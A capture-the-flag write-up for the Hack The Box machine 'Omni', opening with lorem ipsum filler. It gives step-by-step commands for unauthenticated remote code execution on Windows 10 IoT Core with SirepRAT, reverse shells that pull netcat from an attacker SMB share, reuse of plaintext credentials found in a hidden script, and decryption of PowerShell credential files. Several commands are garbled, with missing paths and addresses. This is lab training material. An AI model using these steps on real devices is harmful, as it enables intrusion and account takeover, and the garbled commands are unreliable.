Omni - Hack The Box

Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.



September 2, 2020

“Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.”

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  1. root@nidus:/git/htb# nmap -Pn -sC -sV -n PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 5985/tcp open wsman 8080/tcp open upnp Microsoft IIS httpd | http-auth: | HTTP/1.1 401 Unauthorized0D |_ Basic realm=Windows Device Portal |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Site doesn’t have a title. 29817/tcp open unknown 29819/tcp open unknown 29820/tcp open unknown Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

  2. Visiting port 8080 we are met with a login prompt to “Windows Device Portal”. Googling about it the default credentials are Administrator:p@ssw0rd however they do not work. Reading more tells us this is for OS Windows 10 IoT Core, on Raspberry Pie.

    There are known vulnerabilities and exploits for Win 10 IoT Core, one among them is SirepRAT giving the attacker unauthenticated RCE. Reading the In-Depth paper of IoT Core (Linked below) you’ll find a lot of great information regarding the webserver, how to change Administrator password etc.

  3. Download SirepRAT and start to poke the target to verify code execution. I tried to change the Administartor password but got “Access is denied”, confirming RCE.

    root@nidus:/git/htb/omni/SirepRAT# python LaunchCommandWithOutput –return_output –as_logged_on_user –cmd “C:.exe” –args ” /c net user Administrator 123Abc!” <HResultResult | type: 1, payload length: 4, HResult: 0x0> <OutputStreamResult | type: 11, payload length: 53, payload peek: ‘System error 5 has occurred.Access is denied.’>

    Get a reverse shell, easiest in my opinion is to use nc64.exe from your own SMB-share to trigger a shell. root@nidus:/git/htb/omni/SirepRAT# python LaunchCommandWithOutput –return_output –as_logged_on_user –cmd “C:.exe” –args ” /c // 4488 -e powershell”

    root@nidus:~# rlwrap nc -lvnp 4488 listening on [any] 4488 … connect to [] from (UNKNOWN) [] 49672 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.

    PS C:>

  4. Enumerate the box and instantly we notice that “whoami” doesn’t work, nor do we have any valid users in C:. We can confirm the user by running “$env:UserName” - giving us user DefaultAccount.

    PS C:> $env:UserName $env:UserName DefaultAccount

    PS C:> Get-PSDrive Get-PSDrive

    Name Used (GB) Free (GB) Provider Root
    Alias Alias
    C 1.04 0.54 FileSystem C:\
    Cert Certificate \
    D FileSystem D:\
    Env Environment
    Function Function
    U 0.51 4.37 FileSystem U:\
    Variable Variable
    WSMan WSMan

    With further enumeration we find Users-directories in both C:and U:- however none contain any relevant information. I got stuck here for a good while and started to look back on previous boxes, and found that on the box Resolute (also created by egre55) there was a hidden file containing valuable data.

    So I started to look in every directory for hidden files, and voiala!

    PS C:Files> get-childitem -Path [rs]* -Force get-childitem -Path [rs]* -Force

    Directory: C:Files

    Mode LastWriteTime Length Name
    -a-h– 8/21/2 020 12:56 PM 247 r.bat

    PS C:Files> type r.bat type r.bat @echo off


    for /F “skip=6” %%i in (‘net localgroup “administrators”’) do net localgroup “administrators” %%i /delete

    net user app mesh5143 net user administrator _1nt3rn37ofTh1nGz

    ping -n 3




  5. Change user from DefaultAccount to Administrator and look for user- and root.txt.

PS C:> $env:UserName DefaultAccount PS C:> $env:computername omni PS C:> $user = ‘omni’ PS C:> $pass = ’_1nt3rn37ofTh1nGz’ | ConvertTo-SecureString -AsPlainText -Force PS C:> \(creds = New-Object System.Management.Automation.PSCredential(\)user,$pass) PS C:> Invoke-Command -ComputerName localhost -Credential $creds -ScriptBlock { $env:UserName } Administrator PS C:Files> Invoke-Command -ComputerName localhost -Credential $creds -ScriptBlock { // 4499 -e powershell }

root@nidus:/git/htb/omni# rlwrap nc -lvnp 4499 listening on [any] 4499 … connect to [] from (UNKNOWN) [] 49679 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Data\Users\administrator\Documents> $env:UserName

Looking for root.txt we can see that it’s some how encrypted, same goes with user.txt.

PS C:> type root.txt System.Management.Automation.PSCredential System.Object System.Management.Automation.PSCredential flag 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000011d9a9af9398c648be30a7dd764d1f3a000000000200000000001066000000010000200000004f4016524600b3914d83c0f88322cbed77ed3e3477dfdc9df1a2a5822021439b000000000e8000000002000020000000dd198d09b343e3b6fcb9900b77eb64372126aea207594bbe5bb76bf6ac5b57f4500000002e94c4a2d8f0079b37b33a75c6ca83efadabe077816aa2221ff887feb2aa08500f3cf8d8c5b445ba2815c5e9424926fca73fb4462a6a706406e3fc0d148b798c71052fc82db4c4be29ca8f78f0233464400000008537cfaacb6f689ea353aa5b44592cd4963acbf5c2418c31a49bb5c0e76fcc3692adc330a85e8d8d856b62f35d8692437c2f1b40ebbf5971cd260f738dada1a7

PS C:> type user.txt System.Management.Automation.PSCredential System.Object System.Management.Automation.PSCredential flag 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7

Looking for ways to decrypt this is googled ‘powershell password decrypt’ and found a Microsoft Devblog covering the subject. However following the blog post trying to decrypt the files doesn’t work. Both root- and user.txt gives the same error: “Import-CliXml : Error occurred during a cryptographic operation.”

PS C:> $Credz = Import-CliXml -Path C:.txt $Credz = Import-CliXml -Path C:.txt Import-CliXml : Error occurred during a cryptographic operation. At line:1 char:10 + $Credz = Import-CliXml -Path C:.txt + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [Import-Clixml], Cryptographic Exception + FullyQualifiedErrorId : System.Security.Cryptography.CryptographicExcept ion,Microsoft.PowerShell.Commands.ImportClixmlCommand

PS C:> $Credz = Import-CliXml -Path C:.txt $Credz = Import-CliXml -Path C:.txt Import-CliXml : Error occurred during a cryptographic operation. At line:1 char:10 + $Credz = Import-CliXml -Path C:.txt + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [Import-Clixml], Cryptographic Exception + FullyQualifiedErrorId : System.Security.Cryptography.CryptographicExcept ion,Microsoft.PowerShell.Commands.ImportClixmlCommand

Googling about this it tells that the issue is because of missing machine key in web.config, exact quote: “For anyone who hasn’t solved their problem, I was missing the”machineKey” entry for encrypt/decrypt in my web.config”

  1. So web.config, lets try to approach this from the webb app on port 8080, login with app:mesh5143. Press ‘Processes’ > ‘Run Command’ and get a reverse shell from your local SMB-share: // 4499 -e powershell

    root@nidus:/git/htb/omni# rlwrap nc -lvnp 4499 listening on [any] 4499 … connect to [] from (UNKNOWN) [] 49705 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.

    PS C:> $env:UserName app PS C:> $Credz = Import-CliXml -Path C:.txt PS C:> $Credz.GetNetworkCredential().Password 7cfd50f6bc34db3204898f1505ad9d70

    Finally, we got user.txt.


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  1. As we already have the credentials for Administrator, login again on port 8080 (administrator:_1nt3rn37ofTh1nGz) and repeat the process to grab root.txt.

    Press ‘Processes’ > ‘Run Command’ and get a reverse shell from your local SMB-share: // 4499 -e powershell

root@nidus:/git/htb/omni# rlwrap nc -lvnp 4499 listening on [any] 4499 … connect to [] from (UNKNOWN) [] 49705 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32> $env:UserName
PS C:\windows\system32> $Credz = Import-CliXml -Path C:\Data\Users\administrator\root.txt
PS C:\windows\system32> $Credz.GetNetworkCredential().Password


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In-Depth of IoT Core

Exploit IoT Core


Decrypt PowerShell

Decrypt Error: